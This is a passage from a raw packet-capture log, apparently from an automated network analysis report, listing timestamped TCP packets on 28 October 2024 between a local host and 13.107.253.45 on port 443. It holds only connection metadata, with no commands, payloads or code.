                                                                                                                                                                            Oct 28, 2024 19:13:02.631169081 CET4435926213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.631215096 CET59262443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.632900953 CET59262443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.632910967 CET4435926213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.632925987 CET59262443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.632930994 CET4435926213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.633958101 CET4435926313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.634018898 CET4435926313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.634066105 CET59263443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.635873079 CET59267443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.635922909 CET4435926713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.635991096 CET59267443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.638863087 CET59263443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.638887882 CET4435926313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.638902903 CET59263443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.638910055 CET4435926313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.639955044 CET59267443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.639976025 CET4435926713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.641594887 CET59268443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.641608953 CET4435926813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.641669989 CET59268443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.641827106 CET59268443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.641839027 CET4435926813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.642191887 CET59269443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.642231941 CET4435926913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:02.642287970 CET59269443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.642381907 CET59269443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:02.642400026 CET4435926913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.280956984 CET4435926513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.281588078 CET59265443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.281615019 CET4435926513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.282087088 CET59265443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.282092094 CET4435926513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.290714025 CET4435926613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.291122913 CET59266443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.291157007 CET4435926613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.291711092 CET59266443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.291723013 CET4435926613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.389928102 CET4435926913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.390490055 CET59269443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.390552998 CET4435926913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.390964031 CET59269443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.390974998 CET4435926913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.415488958 CET4435926813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.416218996 CET59268443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.416235924 CET4435926813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.416846037 CET59268443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.416848898 CET4435926813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.419462919 CET4435926513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.419636965 CET4435926513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.419755936 CET59265443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.419812918 CET59265443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.419835091 CET4435926513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.419866085 CET59265443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.419872999 CET4435926513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.422744036 CET59270443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.422770977 CET4435927013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.422842026 CET59270443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.423007011 CET59270443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.423018932 CET4435927013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.430520058 CET4435926613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.430830002 CET4435926613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.430982113 CET59266443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.431039095 CET59266443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.431039095 CET59266443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.431066990 CET4435926613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.431108952 CET4435926613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.434189081 CET59271443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.434243917 CET4435927113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.434345007 CET59271443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.434463024 CET59271443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.434484959 CET4435927113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.434778929 CET4435926713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.435230970 CET59267443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.435265064 CET4435926713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.435704947 CET59267443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.435712099 CET4435926713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.528062105 CET4435926913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.528100014 CET4435926913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.528151989 CET4435926913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.528160095 CET59269443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.528203011 CET59269443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.528558016 CET59269443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.528589010 CET4435926913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.528605938 CET59269443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.528614044 CET4435926913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.531724930 CET59272443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.531773090 CET4435927213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.532049894 CET59272443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.532233953 CET59272443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.532248020 CET4435927213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.553868055 CET4435926813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.554048061 CET4435926813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.554765940 CET59268443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.554991007 CET59268443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.555006981 CET4435926813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.555017948 CET59268443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.555022001 CET4435926813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.557754040 CET59273443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.557797909 CET4435927313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.557991982 CET59273443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.558144093 CET59273443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.558162928 CET4435927313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.578593969 CET4435926713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.578773022 CET4435926713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.578905106 CET59267443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.579010963 CET59267443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.579032898 CET4435926713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.579047918 CET59267443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.579056978 CET4435926713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.581918001 CET59274443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.581969023 CET4435927413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:03.582679987 CET59274443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.582844973 CET59274443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:03.582854986 CET4435927413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.192349911 CET4435927013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.192930937 CET59270443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.192946911 CET4435927013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.193440914 CET59270443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.193444014 CET4435927013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.203747034 CET4435927113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.204256058 CET59271443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.204284906 CET4435927113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.204705000 CET59271443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.204714060 CET4435927113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.314055920 CET4435927313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.314676046 CET59273443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.314713955 CET4435927313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.315186024 CET59273443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.315193892 CET4435927313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.329581022 CET4435927013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.330152988 CET4435927013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.330223083 CET59270443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.330285072 CET59270443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.330296993 CET4435927013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.330310106 CET59270443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.330313921 CET4435927013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.331110954 CET4435927213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.331696987 CET59272443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.331727982 CET4435927213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.332181931 CET59272443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.332186937 CET4435927213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.333595037 CET59275443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.333683968 CET4435927513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.333785057 CET59275443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.333920956 CET59275443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.333942890 CET4435927513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.340536118 CET4435927413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.340976000 CET59274443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.340993881 CET4435927413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.341449976 CET59274443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.341454983 CET4435927413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.453980923 CET4435927313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.454025984 CET4435927313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.454083920 CET59273443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.454098940 CET4435927313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.454204082 CET59273443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.454473019 CET59273443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.454523087 CET4435927313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.454556942 CET59273443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.454572916 CET4435927313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.457617998 CET59276443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.457665920 CET4435927613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.457719088 CET59276443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.457911968 CET59276443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.457922935 CET4435927613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.466726065 CET4435927113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.466753006 CET4435927113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.466801882 CET4435927113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.466820955 CET59271443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.466911077 CET59271443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.467087030 CET59271443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.467087030 CET59271443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.467128038 CET4435927113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.467154980 CET4435927113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.469953060 CET59277443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.469995975 CET4435927713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.470072985 CET59277443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.470242023 CET59277443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.470254898 CET4435927713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.474720001 CET4435927213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.474805117 CET4435927213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.474992990 CET59272443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.475019932 CET59272443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.475037098 CET4435927213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.475052118 CET59272443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.475056887 CET4435927213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.477694988 CET59278443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.477730989 CET4435927813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.477788925 CET59278443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.477917910 CET59278443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.477927923 CET4435927813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.478338003 CET4435927413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.478403091 CET4435927413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.478482962 CET59274443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.478482962 CET59274443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.478574991 CET59274443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.478574991 CET59274443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.478579998 CET4435927413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.478581905 CET4435927413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.480957985 CET59279443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.480969906 CET4435927913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:04.481038094 CET59279443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.481156111 CET59279443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:04.481165886 CET4435927913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.351922989 CET4435927513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.352510929 CET59275443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.352550983 CET4435927513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.352677107 CET4435927613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.353043079 CET59275443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.353054047 CET4435927513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.353132963 CET59276443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.353161097 CET4435927613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.353532076 CET59276443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.353535891 CET4435927613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.482366085 CET4435927713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.482923985 CET59277443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.482969046 CET4435927713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.483417034 CET59277443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.483423948 CET4435927713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.487143040 CET4435927813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.487196922 CET4435927913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.487659931 CET59279443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.487673998 CET4435927913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.487694025 CET59278443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.487715960 CET4435927813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.488127947 CET59279443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.488132954 CET4435927913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.488284111 CET59278443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.488290071 CET4435927813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.489115000 CET4435927513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.489492893 CET4435927513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.489573002 CET59275443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.489625931 CET59275443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.489625931 CET59275443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.489650965 CET4435927513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.489665985 CET4435927513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.490601063 CET4435927613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.490755081 CET4435927613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.490813017 CET59276443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.490912914 CET59276443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.490926981 CET4435927613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.490936995 CET59276443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.490945101 CET4435927613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.493505001 CET59281443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.493541002 CET4435928113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.493571043 CET59280443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.493598938 CET59281443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.493654966 CET4435928013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.493701935 CET59281443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.493715048 CET4435928113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.493737936 CET59280443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.493889093 CET59280443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.493921995 CET4435928013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.618736982 CET4435927713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.618768930 CET4435927713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.618818998 CET4435927713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.618832111 CET59277443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.618868113 CET59277443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.619124889 CET59277443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.619153023 CET4435927713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.619164944 CET59277443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.619169950 CET4435927713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.622328043 CET59282443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.622390985 CET4435928213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.622500896 CET59282443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.622648001 CET59282443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.622679949 CET4435928213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.629010916 CET4435927813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.629103899 CET4435927813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.629297018 CET59278443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.629332066 CET59278443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.629343987 CET4435927813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.629354000 CET59278443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.629359007 CET4435927813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.631532907 CET59283443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.631570101 CET4435928313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.631721973 CET59283443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.631834030 CET59283443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.631844044 CET4435928313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.637758970 CET4435927913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.637931108 CET4435927913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.637989998 CET59279443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.638036013 CET59279443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.638041973 CET4435927913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.638050079 CET59279443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.638052940 CET4435927913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.640320063 CET59284443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.640338898 CET4435928413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:05.640405893 CET59284443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.640507936 CET59284443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:05.640518904 CET4435928413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.283210993 CET4435928013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.283826113 CET59280443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.283859968 CET4435928013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.284296036 CET59280443192.168.2.413.107.253.45
